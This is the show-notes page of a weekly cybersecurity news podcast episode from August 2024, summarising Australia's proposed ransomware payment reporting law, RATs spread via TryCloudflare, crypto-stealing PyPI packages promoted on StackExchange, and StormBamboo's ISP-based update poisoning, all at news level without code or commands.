Cyber Bites by Edwin Kwan
Cyber Bites
Cyber Bites News - 9th August 2024
0:00
Current time: 0:00 / Total time: -4:29
-4:29

Cyber Bites News - 9th August 2024

  • Australia to Mandate Ransomware Payment Disclosure

  • Hackers Abuse Free Cloudflare Tunnels to deliver Remote Access Trojans

  • Stack Exchange Used by Threat Actors to Promote Malicious Open Source Components

  • Hackers Poison Software Updates Through ISP Breach


Australia to Mandate Ransomware Payment Disclosure

https://www.abc.net.au/news/2024-07-30/cyber-ransom-payments-new-laws-before-parliament/104113038

Australia is set to introduce a new law requiring businesses to report ransom payments to the government. This mandatory disclosure aims to improve national cybersecurity by providing law enforcement with greater visibility into ransomware threats and incentivising businesses to strengthen their defences.

The upcoming Cyber Security Act, expected to be debated in parliament soon, will compel businesses exceeding $3 million AUD in annual revenue to report ransom payments. This mirrors similar legislation in the US, but with a broader scope encompassing all businesses, not just critical infrastructure.

The decision follows a string of major cyberattacks on Australian companies, including the Optus and Medibank data breaches, and a cyber disruption that crippled several ports. Ransomware alone costs Australian organisations $3 billion annually.

While this law offers potential benefits, there are concerns. Reporting could create compliance burdens for smaller businesses, and the $15,000 fine for non-compliance may be seen as insufficient. Additionally, some worry it may discourage companies from reporting attacks altogether.

Despite these concerns, the Australian government believes the benefits outweigh the drawbacks. Increased transparency will aid law enforcement in tracking cybercriminals and developing mitigation strategies. Additionally, mandatory disclosure could incentivise businesses to invest more in cybersecurity to avoid the financial and reputational damage of a ransomware attack.

The success of this legislation will depend on its implementation and the resources allocated to support businesses in complying with the new regulations.

Hackers Abuse Free Cloudflare Tunnels to deliver Remote Access Trojans

https://www.proofpoint.com/us/blog/threat-insight/threat-actor-abuses-cloudflare-tunnels-deliver-rats

Cybersecurity researchers are warning of a new wave of malware attacks targeting law firms, financial institutions, and other businesses. The attacks leverage a legitimate service, TryCloudflare, to distribute malicious files and evade detection.

The attacks involve emails with tax-themed lures that contain URLs or attachments leading to malicious LNK files. These files, when opened, trigger scripts that ultimately download and install remote access trojans (RATs) on the victim's computer.

Researchers at Proofpoint first detected this activity in February and have observed a significant increase in the number of malicious emails sent since then. The latest wave, which began on July 11th, has distributed over 1,500 emails, compared to less than 50 in a previous wave in May.

The attackers exploit TryCloudflare, a free service offered by Cloudflare, to host their malicious LNK files. This makes the attacks appear more legitimate as Cloudflare is a trusted company. Additionally, the temporary nature of the TryCloudflare tunnels makes it difficult for defenders to block them.

Experts warn that the ease of use and free nature of TryCloudflare make it an attractive option for cybercriminals. They urge businesses to be cautious of any unsolicited emails, even those that appear to be related to taxes.

Stack Exchange Used by Threat Actors to Promote Malicious Open Source Components

https://checkmarx.com/blog/stackexchange-abused-to-spread-malicious-python-package-that-drains-victims-crypto-wallets/

Cybersecurity researchers warn of a new malware campaign targeting cryptocurrency users. Hackers uploaded malicious Python packages to the PyPI repository and used StackExchange to promote them to unsuspecting victims.

The packages, named after popular blockchain projects like Raydium and Solana, were downloaded over 2,000 times before being removed. Once installed, the packages steal browser data, messages from apps like Telegram and Signal, and cryptocurrency wallet details from services like Exodus and Electrum.

The malware can also take screenshots and steal files with specific keywords, sending everything to a Telegram channel controlled by the attackers.

According to Checkmarx, the attackers exploited the fact that Raydium doesn't have an official Python library. They used the project's name for their malicious package, appearing legitimate at first glance.

The attackers then targeted StackExchange, a popular Q&A platform for developers. They created accounts and left comments under relevant threads, promoting their fake packages as helpful tools. The high-quality answers further enticed victims to download the malware.

Researchers believe the impact of this campaign could be significant, with some victims even having their cryptocurrency wallets drained. Notably, traditional antivirus failed to detect the threat, highlighting the importance of code inspection before use.

This incident underscores the dangers of blindly trusting packages found online, even on reputable platforms like PyPI. Users should always verify the author's credibility and inspect the code before installing any package.

Hackers Poison Software Updates Through ISP Breach

https://www.volexity.com/blog/2024/08/02/stormbamboo-compromises-isp-to-abuse-insecure-software-update-mechanisms/

A sophisticated hacking group, known as StormBamboo, has been caught red-handed deploying malware through a compromised internet service provider (ISP).

Security researchers at Volexity uncovered that StormBamboo exploited vulnerabilities in insecure software update systems to deliver malicious payloads to unsuspecting users. By intercepting and altering DNS requests, the hackers redirected victims to malicious servers which attempted to install malware.

The attack leveraged the trust users place in automatic updates, a tactic that has become increasingly common among cybercriminals. To compound the issue, the group targeted multiple software vendors with weak update security protocols.

Experts warn this incident highlights the critical need for robust security measures in software update processes. As cyber threats evolve, businesses and individuals alike must remain vigilant and adopt best practices to protect against such attacks.

Discussion about this podcast

Cyber Bites by Edwin Kwan
Cyber Bites
Your weekly dose of cyber security news by Edwin Kwan
Stay sharp in the digital world! "Cyber Bites" delivers cybersecurity insights, industry trends, and personal experiences to keep you informed and protected.
Listen on
Substack App
Apple Podcasts
Spotify
YouTube
Pocket Casts
RSS Feed
Appears in episode
Edwin Kwan